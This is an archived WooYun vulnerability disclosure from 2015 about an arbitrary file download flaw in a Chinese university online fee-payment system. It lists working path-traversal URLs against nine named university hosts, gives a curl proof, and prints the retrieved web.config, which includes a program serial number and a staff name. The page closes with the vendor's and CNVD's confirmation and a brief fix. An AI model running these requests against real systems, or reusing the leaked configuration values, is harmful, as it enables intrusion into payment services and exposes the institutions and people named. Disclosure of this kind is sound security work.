天津神州浩天高校网上银行收费系统任意文件下载漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089898

漏洞标题：天津神州浩天高校网上银行收费系统任意文件下载漏洞

漏洞作者： Tea

提交时间：2015-01-04 14:57

修复时间：2015-04-04 14:58

公开时间：2015-04-04 14:58

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-04：细节已通知厂商并且等待厂商处理中
2015-01-09：厂商已经确认，细节仅向厂商公开
2015-01-12：细节向第三方安全合作伙伴开放
2015-03-05：细节向核心白帽子及相关领域专家公开
2015-03-15：细节向普通白帽子公开
2015-03-25：细节向实习白帽子公开
2015-04-04：细节向公众公开

简要描述：

网络上用这个的还是有不少。

详细说明：

http://sfpt.tjufe.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config
http://202.201.166.131/wsyh/admin/down.aspx?type=notice&mc=../../../web.config
http://218.199.196.90/admin/down.aspx?type=notice&mc=../../../web.config
http://fin.hrbnu.edu.cn/wysf/admin/down.aspx?type=notice&mc=../../../web.config
http://218.104.195.23/wsyh/admin/down.aspx?type=notice&mc=../../../web.config
http://jf.cqwu.net/admin/down.aspx?type=notice&mc=../../../web.config
http://202.38.194.47/admin/down.aspx?type=notice&mc=../../../web.config
http://wsyh.tstc.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config
http://218.199.48.15/wsyh/admin/down.aspx?type=notice&mc=../../../web.config

POC：
/admin/down.aspx?type=notice&mc=../../../web.config

漏洞证明：

curl 'http://jf.cqwu.net/admin/down.aspx?type=notice&mc=../../../web.config'
<?xml version="1.0"?>
<!-- 
    注意: 除了手动编辑此文件以外，您还可以使用 
    Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的
     “网站”->“Asp.Net 配置”选项。
    设置和注释的完整列表在 
    machine.config.comments 中，该文件通常位于 
    \Windows\Microsoft.Net\Framework\v2.x\Config 中
-->
<configuration>
	<configSections>
		<section name="log4net" type="System.Configuration.IgnoreSectionHandler"/>
	</configSections>
	<appSettings>
		
		<!--
	#=======================================================================
	#银联在线支付参数配置
	#=======================================================================
		-->
		<add key="Charges_yl" value="0"/>
		<!--#银联支付手续费-->
		<add key="yinlianzfjghc" value="http://jf.cqwu.net/Modules/jycg/yinlian/PayQuery.aspx"/>
		<!--#银联支付结果回传地址-->
		<add key="wy_zdr_yl" value="王家军"/>
		<!--#银联支付制单人-->
    <add key="wy_jffs_yl" value="10"/>
    <!--银联缴费方式-->
    <add key="is_rizhi" value="1"/>
    <!--系统日志-->
		<!--
	#=======================================================================
	#银联在线支付参数配置
	#=======================================================================
		-->
		<add key="BasicClass.CommonClass" value="http://localhost:8081/CommonClass.asmx"/>
		<!--WebService 地址-->
		<add key="xlh" value="B6DD68AA480D7EBD"/>
		<!--网银程序序列号-->
    
		<add key="is_rizhi" value="1"/>
    
		<add key="isOrderError" value="1"/>
	<add key="ips.IpsOrderQuery.IpsCheckTrade" value="http://webservice.ips.net.cn/Sinopay/Standard/IpsCheckTrade.asmx"/>
	</appSettings>
	<connectionStrings/>
	<system.web>
		<!-- 
            设置 compilation debug="true" 将调试符号插入
            已编译的页面中。但由于这会 
            影响性能，因此只在开发过程中将此值 
            设置为 true。
        -->
		<httpHandlers>			
			<add verb="POST,GET" path="*.ashx" type="AjaxPro.AjaxHandlerFactory, AjaxPro"/>
		</httpHandlers>
		<compilation debug="false" targetFramework="4.0">
			<assemblies>
				
				<add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<add assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
				<add assembly="System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
				<!--<add assembly="Microsoft.ReportViewer.WebForms, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>-->
			</assemblies>
			
		</compilation>
		<!--
            通过 <authentication> 节可以配置 ASP.NET 使用的 
            安全身份验证模式，
            以标识传入的用户。 
        -->
		<!-- <authentication mode="Windows" />
   
            如果在执行请求的过程中出现未处理的错误，
            则通过 <customErrors> 节可以配置相应的处理步骤。具体说来，
            开发人员通过该节可以配置
            要显示的 html 错误页
            以代替错误堆栈跟踪。
        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
		<customErrors mode="RemoteOnly" defaultRedirect="sysError.htm">
		</customErrors>
		<httpRuntime maxRequestLength="812000" useFullyQualifiedRedirectUrl="true" executionTimeout="45" requestValidationMode="2.0"/>
		<sessionState mode="InProc" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="20000"/>
		<globalization responseEncoding="gb2312" requestEncoding="gb2312"/>
		<pages controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID"/>
	</system.web>
	<system.webServer>
		<handlers>
			<add name="ReportViewerWebControlHandler" preCondition="integratedMode" verb="*" path="Reserved.ReportViewerWebControl.axd" type="Microsoft.Reporting.WebForms.HttpHandler, Microsoft.ReportViewer.WebForms, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
		</handlers>
		<validation validateIntegratedModeConfiguration="false"/>
  <defaultDocument>
    <files>
      <add value="login.aspx"/>
    </files>
  </defaultDocument>
	</system.webServer>
</configuration>

修复方案：

过滤特殊符合
现在下载文件名，以及限制跨目录

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-01-09 11:10

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道向赛尔教育、厂商通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089898

漏洞标题：天津神州浩天高校网上银行收费系统任意文件下载漏洞

相关厂商：天津神州浩天科技有限公司

漏洞作者： Tea

提交时间：2015-01-04 14:57

修复时间：2015-04-04 14:58

公开时间：2015-04-04 14:58

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089898

漏洞标题：天津神州浩天高校网上银行收费系统任意文件下载漏洞

相关厂商：天津神州浩天科技有限公司

漏洞作者： Tea

提交时间：2015-01-04 14:57

修复时间：2015-04-04 14:58

公开时间：2015-04-04 14:58

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-089898"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：